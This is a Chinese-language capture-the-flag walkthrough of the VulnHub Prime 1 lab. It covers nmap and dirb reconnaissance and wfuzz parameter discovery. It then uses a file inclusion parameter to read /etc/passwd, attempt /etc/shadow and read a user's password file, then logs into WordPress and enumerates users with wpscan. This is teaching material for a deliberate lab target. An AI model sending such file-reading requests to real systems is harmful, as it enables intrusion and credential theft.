渗透流程
渗透流程
获取靶机地址://www.vulnhub.com/entry/prime-1,358/
发现主机:网络C段
使用Nmap工具扫描目标机c段
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.216.1/24
Starting Nmap 7.92 ( //nmap.org ) at 2022-11-05 13:54 CST
Nmap scan report for 192.168.216.1 # 不需要考虑
Host is up (0.000088s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.216.2 # 不需要考虑
Host is up (0.00060s latency).
MAC Address: 00:50:56:FA:F2:EA (VMware)
Nmap scan report for 192.168.216.151
Host is up (0.000090s latency).
MAC Address: 00:0C:29:B7:68:78 (VMware)
Nmap scan report for 192.168.216.254 # 不需要考虑
Host is up (0.00021s latency).
MAC Address: 00:50:56:F4:FA:7B (VMware)
Nmap scan report for 192.168.216.128 # kali的IP
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.96 seconds
一共只有两个机器
确定192.168.216.15为目标机的ip
端口扫描
扫描主机的端口可以知道主机上有哪一些服务
#全面扫描/综合扫描
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.216.151
Starting Nmap 7.92 ( //nmap.org ) at 2022-11-05 14:28 CST
Nmap scan report for 192.168.216.151
Host is up (0.00050s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:B7:68:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.216.151
OS and Service detection performed. Please report any incorrect results at //nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
发现主机打开了两个端口: 22(ssh) 80(Apach)
我们访问这个80端口看看部署的网站
目录扫描
我们可以目录扫描看看这个网站的子目录,是否存在敏感目录、文件
使用dirb
使用御剑或者其他,也可以使用kali自带的dirb工具
#man dirb
DIRB(1) General Commands Manual DIRB(1)
NAME
dirb - Web Content Scanner
SYNOPSIS
dirb <url_base> <url_base> [<wordlist_file(s)>] [options]
DESCRIPTION
DIRB IS a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basi‐
cally works by launching a dictionary basesd attack against a web server and analizing the
response.
OPTIONS
-a <agent_string>
Specify your custom USER_AGENT. (Default is: "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1)")
-b Don't squash or merge sequences of /../ or /./ in the given URL.
-c <cookie_string>
Set a cookie for the HTTP request.
-E <certificate>
Use the specified client certificate file.
-f Fine tunning of NOT_FOUND (404) detection.
-H <header_string>
Add a custom header to the HTTP request.
-i Use case-insensitive Search.
-l Print "Location" header when found.
-N <nf_code>
Ignore responses with this HTTP code.
-o <output_file>
Save output to disk.
-p <proxy[:port]>
Use this proxy. (Default port is 1080)
-P <proxy_username:proxy_password>
Proxy Authentication.
-r Don't Search Recursively.
-R Interactive Recursion. (Ask in which directories you want to scan)
-S Silent Mode. Don't show tested words. (For dumb terminals)
-t Don't force an ending '/' on URLs.
-u <username:password>
Username and password to use.
-v Show Also Not Existent Pages.
-w Don't Stop on WARNING messages.
-x <extensions_file>
Amplify search with the extensions on this file.
-X <extensions>
Amplify search with this extensions.
-z <milisecs>
Amplify search with this extensions.
SEE ALSO
┌──(root㉿kali)-[~]
└─# dirb //192.168.216.151
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 5 15:30:57 2022
URL_BASE: //192.168.216.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: //192.168.216.151/ ----
+ //192.168.216.151/dev (CODE:200|SIZE:131) #*
+ //192.168.216.151/index.php (CODE:200|SIZE:136) #我们看到的网页
==> DIRECTORY: //192.168.216.151/javascript/
+ //192.168.216.151/server-status (CODE:403|SIZE:280)
==> DIRECTORY: //192.168.216.151/wordpress/ #*
---- Entering directory: //192.168.216.151/javascript/ ----
==> DIRECTORY: //192.168.216.151/javascript/jquery/
---- Entering directory: //192.168.216.151/wordpress/ ----
+ //192.168.216.151/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/
==> DIRECTORY: //192.168.216.151/wordpress/wp-includes/
+ //192.168.216.151/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: //192.168.216.151/javascript/jquery/ ----
+ //192.168.216.151/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/ ----
+ //192.168.216.151/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/css/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/images/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/includes/
+ //192.168.216.151/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/js/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/maint/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/network/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/user/
---- Entering directory: //192.168.216.151/wordpress/wp-content/ ----
+ //192.168.216.151/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/plugins/
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/themes/
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/uploads/
---- Entering directory: //192.168.216.151/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/network/ ----
+ //192.168.216.151/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ //192.168.216.151/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/user/ ----
+ //192.168.216.151/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ //192.168.216.151/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-content/plugins/ ----
+ //192.168.216.151/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-content/themes/ ----
+ //192.168.216.151/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 5 15:31:35 2022
DOWNLOADED: 46120 - FOUND: 15
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/dev
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
缩小范围,设置后缀名之查找是否存在 .txt .zip .php 文件
┌──(root㉿kali)-[~]
└─# dirb //192.168.216.151 -X .txt,.zip,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 5 15:42:46 2022
URL_BASE: //192.168.216.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.zip,.php) | (.txt)(.zip)(.php) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: //192.168.216.151/ ----
+ //192.168.216.151/image.php (CODE:200|SIZE:147) #这文件和我们看到的网站页面源代码差不多 ****
+ //192.168.216.151/index.php (CODE:200|SIZE:136) #我们看到的网站页面源代码
+ //192.168.216.151/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Sat Nov 5 15:42:55 2022
DOWNLOADED: 13836 - FOUND: 3
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
#使用工具 fuzz 进一步对两个 php 挖掘
//github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
#工具地址
//see the location.txt and you will get your next move//
#提示:当我们看到 location.txt 这个文件的时候就可以进行下一步
参数爆破
利用fuzz
模糊测试,利用fuzz找到这个页面接受的参数
比如: //192.168.216.151/image.php?FUZZ=location.txt
fuzz作用:
找到参数
sql注入
密码暴力破解
- 知道用户不知道密码
- 用户名密码都不知道
过WAF
我们这里使用kali自带的工具 : wfuzz
wfuzz使用
┌──(root㉿kali)-[~]
└─# wfuzz -h
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
* *
* Version up to 1.4c coded by: *
* Christian Martorella ([email protected]) *
* Carlos del ojo ([email protected]) *
* *
* Version 1.4d to 3.1.0 coded by: *
* Xavier Mendez ([email protected]) *
********************************************************
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h : This help
--help : Advanced help
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information. #详细信息
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program. #如果选中,将捕获所有按键。这允许您与程序交互
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level (0 default)
-D depth : Maximum link depth level (4 default)
-L, --follow : Follow HTTP redirections
-u url : Specify a URL for the request.
-z payload : Specify a payload for each FUZZ keyword used in the form of type,parameters,encoder.
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-b cookie : Specify a cookie for the requests
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ")
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/Hide responses with the specified regex within the content
┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u //192.168.216.151/index.php?FUZZ -c
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: //192.168.216.151/index.php?FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000050: 200 7 L 12 W 136 Ch "agent"
000000003: 200 7 L 12 W 136 Ch "01"
000000015: 200 7 L 12 W 136 Ch "2001"
000000031: 200 7 L 12 W 136 Ch "action"
000000007: 200 7 L 12 W 136 Ch "10"
000000049: 200 7 L 12 W 136 Ch "adsl"
000000045: 200 7 L 12 W 136 Ch "adminlogon"
000000040: 200 7 L 12 W 136 Ch "administration"
....后面有很多看的不清楚使用过滤
-w 指定kali wfuzz自带的字典 -u 可以不要写,指定url --hw 过滤 12w (word字母)的数据
┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u //192.168.216.151/index.php?FUZZ -c --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: //192.168.216.151/index.php?FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
可以确定存在一个file的参数
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/index.php?file=
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>you are digging wrong file</html>
存在这个参数,但是不知道是什么文件,我们使用上面提示的 location.txt
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>
file 这个参数只是过渡,真正的参数是 'secrettier360'
再对两个 php 文件加上参数访问
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/index.php?secrettier360=
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
</html>
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>
这个参数可以查看系统中的任意文件
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=/etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
linux密码文件存在 /etc/shadom
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=/etc/shadow
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>
这里看不到,但是我们在/etc/passwd中的倒数第二行:
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
和我们的系统登录中:
我们去看这个文件 password.txt
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
这个 follow_the_ippsec
是否就是密码
我们来用ssh登录
┌──(root㉿kali)-[~]
└─# ssh -p 22 [email protected]
The authenticity of host '192.168.216.151 (192.168.216.151)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.216.151' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
应该不是用户 victor 的密码
但是我们在目录扫描的时候还有发现存在 WordPress ,是不是WordPress的密码呢
我们访问网址: //192.168.216.151/wordpress/wp-admin
用户名: victor 密码:follow_the_ippsec 登录
登录成功
我们这里在不知道用户名的情况下我们我可以使用指纹识别,查看是否有收集 WordPress的用户信息
指纹识别
cmseek工具使用
使用指纹收集 kali 的 cmseek工具识别这个网站是否有收集的用户名
___ _ _ ____ ____ ____ _ _
| |\/| [__ |___ |___ |_/ by @r3dhax0r
|___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA
[+] Deep Scan Results [+]
┏━Target: 192.168.216.151
┃
┠── CMS: WordPress
┃ │
┃ ├── Version: 5.2.2
┃ ╰── URL: //wordpress.org
┃
┠──[WordPress Deepscan]
┃ │
┃ ├── Readme file found: //192.168.216.151/wordpress//readme.html
┃ ├── License file: //192.168.216.151/wordpress//license.txt
┃ ├── Changelog: //codex.wordpress.org/Version_5.2.2
┃ │
┃ ├── Themes Enumerated: 1
┃ │ │
┃ │ ╰── Theme: twentynineteen
┃ │ │
┃ │ ├── Version: 1.4
┃ │ ╰── URL: //192.168.216.151/wordpress//wp-content/themes/twentynineteen
┃ │
┃ ╰── Version vulnerabilities: 7
┃ │
┃ │
┃ ├── WordPress before 5.2.3 allows XSS in post previews by authenticated users.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CVE-2019-16223
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 has an issue with URL sanitization in wp_kses_bad_protocol_once in wp-includes/kses.php that can lead to cross-site scripting (XSS) attacks.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //core.trac.wordpress.org/changeset/45997
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 allows reflected XSS in the dashboard.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//core.trac.wordpress.org/changeset/45997
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── In WordPress before 5.2.3, validation and sanitization of a URL in wp_validate_redirect in wp-includes/pluggable.php could lead to an open redirect.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //core.trac.wordpress.org/changeset/45971
┃ │ ├── Reference: //github.com/WordPress/WordPress/commit/c86ee39ff4c1a79b93c967eb88522f5c09614a28
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 allows XSS in shortcode previews.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //fortiguard.com/zeroday/FG-VD-18-165
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 allows XSS in stored comments.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ╰── WordPress before 5.2.3 allows XSS in media uploads because wp_ajax_upload_attachment is mishandled.
┃ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CVE-2019-16217
┃ ├── Reference: //core.trac.wordpress.org/changeset/45936
┃ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ ╰── Fixed In Version: N/A
┃
┠── Result: /usr/share/cmseek/Result/192.168.216.151_wordpress/cms.json
┃
┗━Scan Completed in 6.11 Seconds, using 45 Requests
这里打出存在WordPress的漏洞信息指纹,但是没有我们需要的用户名信息,其实这个是可以把用户信息找到的
只是这个找不到,大部分是可以的
wapsan使用
WPSCAN(1) User Commands WPSCAN(1)
NAME
wpscan - WordPress Security Scanner
SYNOPSIS
wpscan [options]
DESCRIPTION
WordPress Security Scanner by the WPScan Team
Sponsored by Sucuri - //sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
OPTIONS
--url URL
The URL of the blog to scan Allowed Protocols: http, https Default Protocol if none provided: http This option is mandatory unless update or help or hh or version
is/are supplied
-h, --help
Display the simple help and exit
--hh Display the full help and exit
--version
Display the version and exit
-v, --verbose
Verbose mode
--[no-]banner
Whether or not to display the banner Default: true
-o, --output FILE
Output to FILE
-f, --format FORMAT
Output results in the format supplied Available choices: cli-no-colour, cli-no-color, json, cli
--detection-mode MODE
Default: mixed Available choices: mixed, passive, aggressive
--user-agent, --ua VALUE
--random-user-agent, --rua
Use a random user-agent for each scan
--http-auth login:password
-t, --max-threads VALUE
The max threads to use Default: 5
--throttle MilliSeconds
Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.
--request-timeout SECONDS
The request timeout in seconds Default: 60
--connect-timeout SECONDS
The connection timeout in seconds Default: 30
--disable-tls-checks
Disables SSL/TLS certificate verification
--proxy protocol://IP:port
Supported protocols depend on the cURL installed
--proxy-auth login:password
--cookie-string COOKIE
Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]
--cookie-jar FILE-PATH
File to read and write cookies Default: /tmp/wpscan/cookie_jar.txt
--force
Do not check if the target is running WordPress
--[no-]update
Whether or not to update the Database
--wp-content-dir DIR
--wp-plugins-dir DIR
-e, --enumerate [OPTS]
Enumeration Process Available Choices:
vp Vulnerable plugins
ap All plugins
p Plugins
vt Vulnerable themes
at All themes
t Themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g: u1-5 Range separator to use: '-' Value if no argument supplied: 1-10
m Media IDs range. e.g m1-15 Note: Permalink setting must be set to "Plain" for those to be detected Range separator to use: '-' Value if no argument supplied:
1-100
Separator to use between the values: ',' Default: All Plugins, Config Backups Value if no argument supplied: vp,vt,tt,cb,dbe,u,m Incompatible choices (only one of
each group/s can be used):
- vp, ap, p - vt, at, t
--exclude-content-based REGEXP_OR_STRING
Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration. Both the headers and body are checked. Regexp delimiters are not re‐
quired.
--plugins-detection MODE
Use the supplied mode to enumerate Plugins, instead of the global (--detection-mode) mode. Default: passive Available choices: mixed, passive, aggressive
--plugins-version-detection MODE
Use the supplied mode to check plugins versions instead of the --detection-mode or --plugins-detection modes. Default: mixed Available choices: mixed, passive, ag‐
gressive
-P, --passwords FILE-PATH
List of passwords to use during the password attack. If no --username/s option supplied, user enumeration will be run.
-U, --usernames LIST
List of usernames to use during the password attack. Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'
--multicall-max-passwords MAX_PWD
Maximum number of passwords to send by request with XMLRPC multicall Default: 500
--password-attack ATTACK
Force the supplied attack to be used rather than automatically determining one. Available choices: wp-login, xmlrpc, xmlrpc-multicall
--stealthy
Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive
To see full list of options use --hh.
wpscan March 2019
#使用枚举的方式把用户从 wpscan 的数据库中找出
┌──(root㉿kali)-[~]
└─# wpscan --url //192.168.216.151/wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: //192.168.216.151/wordpress/ [192.168.216.151]
[+] Started: Sat Nov 5 17:15:10 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: //192.168.216.151/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - //codex.wordpress.org/XML-RPC_Pingback_API
| - //www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - //www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - //www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - //www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: //192.168.216.151/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: //192.168.216.151/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: //192.168.216.151/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - //www.iplocation.net/defend-wordpress-from-ddos
| - //github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
